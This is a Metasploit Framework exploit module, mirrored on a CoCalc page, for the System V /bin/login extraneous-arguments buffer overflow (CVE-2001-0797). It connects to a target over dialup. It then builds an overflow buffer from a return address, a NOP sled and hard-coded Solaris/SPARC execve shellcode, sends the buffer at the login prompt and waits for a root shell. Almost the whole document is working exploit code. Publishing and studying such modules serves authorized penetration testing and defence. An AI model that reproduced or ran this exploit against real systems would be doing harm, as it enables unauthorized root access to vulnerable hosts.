CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/dialup/multi/login/manyargs.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Dialup910def initialize(info = {})11super(update_info(info,12'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',13'Description' => %q{14This exploit connects to a system's modem over dialup and exploits15a buffer overflow vulnerability in it's System V derived /bin/login.16The vulnerability is triggered by providing a large number of arguments.17},18'References' =>19[20[ 'CVE', '2001-0797'],21[ 'OSVDB', '690'],22[ 'OSVDB', '691'],23[ 'BID', '3681'],24[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],25[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],26],27'Author' =>28[29'I)ruid',30],31'Arch' => ARCH_TTY,32'Platform' => ['unix'],33'License' => MSF_LICENSE,34'Payload' =>35{36'Space' => 3000,37'BadChars' => '',38'DisableNops' => true,39},40'Targets' =>41[42[ 'Solaris 2.6 - 8 (SPARC)',43{44'Platform' => 'unix',45'Ret' => 0x00027184,46# Solaris/SPARC special shellcode (courtesy of inode)47# execve() + exit()48'Shellcode' =>49"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +50"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +51"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +52"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",53'NOP' => "\x90\x1b\x80\x0e",54}55],56],57'DefaultTarget' => 0,58'DisclosureDate' => '2001-12-12'))5960register_options(61[62# OptString.new('USER', [true, 'User to log in as', 'bin']),63])64end6566def buildbuf67print_status("Targeting: #{self.target.name}")6869retaddr = self.target.ret70shellcode = self.target['Shellcode']71nop = self.target['NOP']7273user = datastore['USER']74command = datastore['COMMAND'] + "\n"7576# prepare the evil buffer77i = 078buf = ''7980# login name81buf[i,4] = 'bin '82i += 48384# return address85buf[i,4] = [retaddr].pack('N')86i += 487buf[i,1] = ' '88i += 18990# trigger the overflow91(0...60).each {|c|92buf[i,2] = 'a '93i += 294}9596# padding97buf[i,4] = ' BBB'98i += 499100# nop sled and shellcode101(0...398).each {|c|102buf[i,nop.size] = nop103i += nop.size104}105shellcode.each_byte {|b|106c = b.chr107case 'c'108when "\\"109buf[i,2] = "\\\\"110i += 2111when "\xff", "\n", " ", "\t"112buf[i,1] = "\\"113buf[i+1,1] = (((b & 0300) >> 6) + '0').chr114buf[i+2,1] = (((b & 0070) >> 3) + '0').chr115buf[i+3,1] = ( (b & 0007) + '0').chr116i += 4117else118buf[i,1] = c119i += 1120end121}122# TODO: need to overwrite/skip the last byte of shellcode?123#i -= 1124125# padding126buf[i,4] = 'BBB '127i += 4128129# pam_handle_t: minimal header130buf[i,16] = 'CCCCCCCCCCCCCCCC'131i += 16132buf[i,4] = [retaddr].pack('N')133i += 4134buf[i,4] = [0x01].pack('N')135i += 4136137# pam_handle_t: NULL padding138(0...52).each {|c|139buf[i,4] = [0].pack('N')140i += 4141}142143# pam_handle_t: pameptr must be the 65th ptr144buf[i,9] = "\x00\x00\x00 AAAA\n"145i += 9146147return buf148end149150def exploit151buf = buildbuf152153print_status("Dialing Target")154if not connect_dialup155print_error("Exiting.")156return157end158159print_status("Waiting for login prompt")160161res = dialup_expect(/ogin:\s/i, 10)162#puts Rex::Text.to_hex_dump(res[:buffer])163if not res[:match]164print_error("Login prompt not found... Exiting.")165disconnect_dialup166return167end168169# send the evil buffer, 256 chars at a time170print_status("Sending evil buffer...")171#puts Rex::Text.to_hex_dump(buf)172len = buf.length173p = 0174while(len > 0) do175i = len > 0x100 ? 0x100 : len176#puts Rex::Text.to_hex_dump(buf[p,i])177dialup_puts(buf[p,i])178len -= i179p += i180# if len > 0181# puts Rex::Text.to_hex_dump("\x04")182# dialup_puts("\x04") if len > 0183# end184select(nil,nil,nil,0.5)185end186187# wait for password prompt188print_status("Waiting for password prompt")189res = dialup_expect(/assword:/i, 30)190#puts Rex::Text.to_hex_dump(res[:buffer])191if not res[:match]192print_error("Target is likely not vulnerable... Exiting.")193disconnect_dialup194return195end196197print_status("Password prompt received, waiting for shell")198dialup_puts("pass\n")199200res = dialup_expect(/#\s/i, 20)201#puts Rex::Text.to_hex_dump(res[:buffer])202if not res[:match]203print_error("Shell not found.")204print_error("Target is likely not vulnerable... Exiting.")205disconnect_dialup206return207end208209print_status("Success!!!")210handler211212disconnect_dialup213end214end215216217